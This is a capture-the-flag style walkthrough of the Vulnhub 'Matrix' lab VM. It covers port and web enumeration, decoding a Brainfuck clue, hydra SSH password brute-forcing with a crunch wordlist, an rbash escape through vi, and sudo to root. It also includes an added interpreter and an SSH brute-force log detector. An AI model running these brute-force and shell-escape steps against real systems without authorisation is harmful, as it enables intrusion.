Today, a little training: Matrix (from Vulnhub).
Since I was on holiday last week, it's time for a little exercise.

Description:

Matrix is a medium level boot2 root challenge. The OVA has been tested on both VMware and Virtual Box.
Difficulty: Intermediate
Flags: Your Goal is to get root and read /root/flag.txt
Networking: DHCP: Enabled IP Address: Automatically assigned
Hint: Follow your intuitions ... and enumerate!
For any questions, feel free to contact me on Twitter: @unknowndevice64


URL: https://www.vulnhub.com/entry/matrix-1,259/



Setup

Following the KISS principle, I will export the IP of the target as an environment variable.

export IP=192.168.56.106

If you need a little memo about pentest tools, check mine (updated fairly regularly):
https://gitlab.com/AGS_321/pentest_wiki/wikis/home

So let's rock!

Port scan

nmap -A -T4 -n -p- -oN nmap_out_$(date +%Y-%m-%d:%H:%M:%S).txt $IP
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-28 22:58 CET
Nmap scan report for 192.168.56.106
Host is up (0.00045s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
|   256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_  256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519)
80/tcp    open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
MAC Address: 08:00:27:89:02:83 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.56.106

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.20 seconds

So we have:

  • SSH service (22)
  • Webserver (80)
  • Webserver (31337)

Webserver 31337

Let's run a nikto scan (force of habit).

nikto -host http://$IP:31337/ -Format txt -output nikto_out_$(date +%Y-%m-%d:%H:%M:%S).txt

The only useful result is this:

Server: SimpleHTTP/0.6 Python/2.7.14
SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)

As the description says, let's "enumerate".

gobuster -u http://$IP:31337/ -w /usr/share/dirb/wordlists/common.txt -x txt,php

Unfortunately, nothing useful for me...

Let's move on to the other services.

Webserver 80

nikto -h http://$IP/ -Format txt -output nikto_out_$(date +%Y-%m-%d:%H:%M:%S).txt

As you can see, I tried several enumeration runs but found nothing...

gobuster -u $IP -w /usr/share/dirb/wordlists/common.txt -x txt,php

gobuster -u $IP -w /usr/share/wordlists/wfuzz/general/big.txt -x txt,php

After a break, I took the time to look more closely at the results of my scans and finally found something usable.

In the source code of http://192.168.56.106:31337/, at line 71.

A bit of base64 inside an HTML comment.

Once decoded, I get this:

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

So let's download it!

wget http://192.168.56.106:31337/Cypher.matrix

The downloaded file contains the following:
+++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++
+.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.-
-.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+
+++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>---
---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[-
>++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- -----
-<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++
+[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+
+++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++<
]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[
->+++ +++++ <]>++ +++++ .<+++ [->++ +<]>+ ++++. <++++ [->-- --<]> .<+++
[->++ +<]>+ ++++. +.<++ +++++ +[->- ----- --<]> ----- ---.< +++[- >---<
]>--- .<+++ +++++ +[->+ +++++ +++<] >++++ ++.<+ ++[-> ---<] >---- -.<++
+[->+ ++<]> ++.<+ ++[-> ---<] >---. <++++ ++++[ ->--- ----- <]>-- -----
-.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ +++++ +.<++ +[->- --<]> -----
-.<++ ++[-> ++++< ]>++. .++++ .---- ----. +++.< +++[- >---< ]>--- --.<+
+++++ ++[-> ----- ---<] >---- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++
.<+++ ++++[ ->--- ----< ]>--- ----- -.<++ +++++ [->++ +++++ <]>++ +++++
+++.. <++++ +++[- >---- ---<] >---- ----- --.<+ +++++ ++[-> +++++ +++<]
>++.< +++++ [->-- ---<] >-..< +++++ +++[- >---- ----< ]>--- ----- ---.-
--.<+ +++++ ++[-> +++++ +++<] >++++ .<+++ ++[-> +++++ <]>++ +++++ +.+++
++.<+ ++[-> ---<] >---- --.<+ +++++ [->-- ----< ]>--- ----. <++++ +[->-
----< ]>-.< +++++ [->++ +++<] >++++ ++++. <++++ +[->+ ++++< ]>+++ +++++
+.<++ ++[-> ++++< ]>+.+ .<+++ +[->- ---<] >---- .<+++ [->++ +<]>+ +..<+
++[-> +++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- ----- --.<+ ++[->
---<] >---. <++++ ++[-> +++++ +<]>+ ++++. <++++ ++[-> ----- -<]>- ----.
<++++ ++++[ ->+++ +++++ <]>++ ++++. +++++ ++++. +++.< +++[- >---< ]>--.
--.<+ ++[-> +++<] >++++ ++.<+ +++++ +++[- >---- ----- <]>-- -.<++ +++++
+[->+ +++++ ++<]> +++++ +++++ ++.<+ ++[-> ---<] >--.< ++++[ ->+++ +<]>+
+.+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
+.+++ .---- ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++
+++[- >++++ ++++< ]>+++ .++++ +.--- ----. <++++ [->++ ++<]> +.<++ ++[->
----< ]>-.+ +.<++ ++[-> ++++< ]>+.< +++[- >---< ]>--- ---.< +++[- >+++<
]>+++ +.+.< +++++ ++++[ ->--- ----- -<]>- -.<++ +++++ ++[-> +++++ ++++<
]>++. ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++ +[->+
+++++ <]>++ +++.< +++++ +[->- ----- <]>-- ---.< +++++ +++[- >++++ ++++<
]>+++ +++++ .---- ---.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.<++
+++++ +[->- ----- --<]> ----- .<+++ +++++ +[->+ +++++ +++<] >+.<+ ++[->
---<] >---- .<+++ [->++ +<]>+ +.--- -.<++ +[->- --<]> --.++ .++.- .<+++
+++++ [->-- ----- -<]>- ---.< +++++ ++++[ ->+++ +++++ +<]>+ +++++ .<+++
[->-- -<]>- ----. <+++[ ->+++ <]>++ .<+++ [->-- -<]>- --.<+ +++++ ++[->
----- ---<] >---- ----. <++++ +++[- >++++ +++<] >++++ +++.. <++++ +++[-
>---- ---<] >---- ---.< +++++ ++++[ ->+++ +++++ +<]>+ ++.-- .++++ +++.<
+++++ ++++[ ->--- ----- -<]>- ----- --.<+ +++++ +++[- >++++ +++++ <]>++
+++++ +.<++ +[->- --<]> -.+++ +++.- --.<+ +++++ +++[- >---- ----- <]>-.
<++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ .++++ +++++ .<+++ +[->- ---<]
>--.+ +++++ ++.<+ +++++ ++[-> ----- ---<] >---- ----- --.<+ +++++ ++[->
+++++ +++<] >+.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .<+++ +++++ [->--
----- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++ +++.< +++[-
>---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]>
+++.< +++[- >+++< ]>+++ .+++. .<+++ [->-- -<]>- ---.- -.<++ ++[-> ++++<
]>+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
.+.-- .---- ----- .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- -----
.<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. ----- ----. <++++ ++++[
->--- ----- <]>-- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++.
<+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..+ +++.- ----- --.++ +.<++
+[->- --<]> ----- .<+++ ++++[ ->--- ----< ]>--- --.<+ ++++[ ->--- --<]>
----- ---.- --.<

It's a Brainfuck program; let's find a tool to decipher it.

This program displays the following text:

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
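To run Cypher.matrix yourself, here is a minimal Brainfuck interpreter, added as an example (it is not the tool the author used). It skips the spaces and line breaks that split the file into 5-character groups and uses 8-bit wrapping cells:

```python
# Minimal Brainfuck interpreter (added example; not code from the original post).
# Usage: run_brainfuck(open("Cypher.matrix").read()) returns the program's output.


def build_jump_table(code):
    """Pair every '[' with its ']' so loops jump in O(1) instead of rescanning."""
    stack, jumps = [], {}
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise SyntaxError("unmatched ']' at instruction %d" % pos)
            start = stack.pop()
            jumps[start], jumps[pos] = pos, start
    if stack:
        raise SyntaxError("unmatched '[' at instruction %d" % stack[-1])
    return jumps


def run_brainfuck(src, tape_size=30000):
    """Execute Brainfuck source and return its output as a string."""
    # Anything that is not a command (the spaces and newlines that split
    # Cypher.matrix into 5-character groups) is a comment and is dropped.
    # ',' (input) is never needed by this file and is dropped as well.
    code = [c for c in src if c in "+-<>.[]"]
    jumps = build_jump_table(code)
    tape = bytearray(tape_size)      # 8-bit cells that wrap around
    ptr = pc = 0
    out = []
    while pc < len(code):
        op = code[pc]
        if op == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif op == ">":
            ptr += 1
        elif op == "<":
            ptr -= 1
        elif op == ".":
            out.append(chr(tape[ptr]))
        elif op == "[" and tape[ptr] == 0:
            pc = jumps[pc]           # skip the loop body
        elif op == "]" and tape[ptr] != 0:
            pc = jumps[pc]           # repeat the loop body
        if not 0 <= ptr < tape_size:
            raise IndexError("tape pointer left the tape at instruction %d" % pc)
        pc += 1
    return "".join(out)
```

Feeding the downloaded file to run_brainfuck() returns the guest/password note quoted above.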

It seems obvious that we will have to brute-force SSH authentication.

Bruteforce SSH

The plan:

  1. Generate a wordlist following the given pattern (crunch is the perfect tool for that)
  2. Use hydra to test this wordlist

Generate the wordlist using only lowercase letters (because the note says "two characters"), as I felt lucky enough not to try uppercase.

crunch 8 8 -t k1ll0r@@ -o specific_wordlist.txt

OK, not lucky enough...

Let's use all possible lowercase, uppercase and numeric combinations!

Because I use Kali as my pentest distro, I have to adapt the commands from the manual.

Let's find the definition of the charsets available for crunch.

locate charset.lst
/usr/share/crunch/charset.lst

Now let's generate the wordlist.

crunch 8 8 -f /usr/share/crunch/charset.lst mixalpha-numeric-all-space -t k1ll0r@@ -o specific_wordlist.txt

Use hydra to test this wordlist:

hydra -l guest -P specific_wordlist.txt 192.168.56.106 -t 10 ssh

And boom!

[22][ssh] host: 192.168.56.106   login: guest   password: k1ll0r7n

Hydra found the password.
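From the defender's side, a run like this (hydra with 10 parallel tasks against a single account) leaves a burst of "Failed password" lines in sshd's auth log. As an added example, not part of the original post, the following flags any source IP that exceeds a threshold of failed logins inside a sliding time window, run over constructed auth.log lines (the hostname, PIDs and the 192.168.56.1 client address are assumed):

```python
# Added example (not from the original post): flag SSH password-guessing
# from sshd auth-log lines. The log lines below are constructed samples in
# the classic syslog format that Debian/Kali write to /var/log/auth.log.
import re
from collections import defaultdict
from datetime import datetime

# sshd failure line, e.g.
# "Feb 28 23:10:01 matrix sshd[1234]: Failed password for guest from 192.168.56.1 port 40112 ssh2"
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)


def parse_ts(ts, year=2019):
    # Syslog timestamps carry no year; the caller supplies it.
    return datetime.strptime("%d %s" % (year, ts), "%Y %b %d %H:%M:%S")


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return {ip: (max_failures_in_window, sorted usernames tried)} for every
    source IP with at least `threshold` failed logins within `window_s` seconds."""
    events = defaultdict(list)        # ip -> [(timestamp, user), ...]
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            events[m["ip"]].append((parse_ts(m["ts"]), m["user"]))
    hits = {}
    for ip, evs in events.items():
        evs.sort()
        start, best = 0, 0
        for end in range(len(evs)):
            # Slide the window start forward until the span fits in window_s.
            while (evs[end][0] - evs[start][0]).total_seconds() > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hits[ip] = (best, sorted({u for _, u in evs}))
    return hits


SAMPLE_LOG = [  # constructed sample: a short guessing burst, then a success
    "Feb 28 23:10:01 matrix sshd[1201]: Failed password for guest from 192.168.56.1 port 40112 ssh2",
    "Feb 28 23:10:01 matrix sshd[1202]: Failed password for guest from 192.168.56.1 port 40113 ssh2",
    "Feb 28 23:10:02 matrix sshd[1203]: Failed password for guest from 192.168.56.1 port 40114 ssh2",
    "Feb 28 23:10:02 matrix sshd[1204]: Failed password for invalid user admin from 192.168.56.1 port 40115 ssh2",
    "Feb 28 23:10:03 matrix sshd[1205]: Failed password for guest from 192.168.56.1 port 40116 ssh2",
    "Feb 28 23:10:04 matrix sshd[1206]: Accepted password for guest from 192.168.56.1 port 40117 ssh2",
    "Feb 28 23:15:30 matrix sshd[1300]: Failed password for trinity from 192.168.56.20 port 51000 ssh2",
]
```

A successful login right after such a burst (the "Accepted password" line) is the event worth alerting on, since it is exactly what the hydra run above produces.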

Bypass the restricted shell

So once logged in, I'm confronted with rbash:

I did my homework and came back with this document about rbash: https://docs.oracle.com/cd/E36784_01/html/E36870/rbash-1.html
And this little guide to bypassing the restricted shell:

To bypass restriction:

  1. run VI
  2. run :!/bin/sh from within VI

And voilà, I managed to get a shell, but there is a little kink: I can't use every command I want (such as ls).
I knew that, because of the restricted shell, the PATH variable had been modified, so I added some locations to it.

Now that I have all the tools I want, let's do some basic reconnaissance.
Let's check the accounts on the target (force of habit).

Boom

Become root and get the final flag

If I read that correctly, the guest account is part of the "sudoers", meaning that I can now invoke sudo with guest's password.
Let's check that out!

Now I can become root via a simple trick:

sudo su

The last flag is waiting: let's go!

Conclusion

And done!

A good little exercise after the holidays.


Social stuff / Questions / Comments

Feel free to reach out or tip me!

Mail: a_ghost_soul@protonmail.com
Twitter: @GhostAgs

If you appreciate my work, please consider making a donation.
Tipeee: https://fr.tipeee.com/ags-syndrome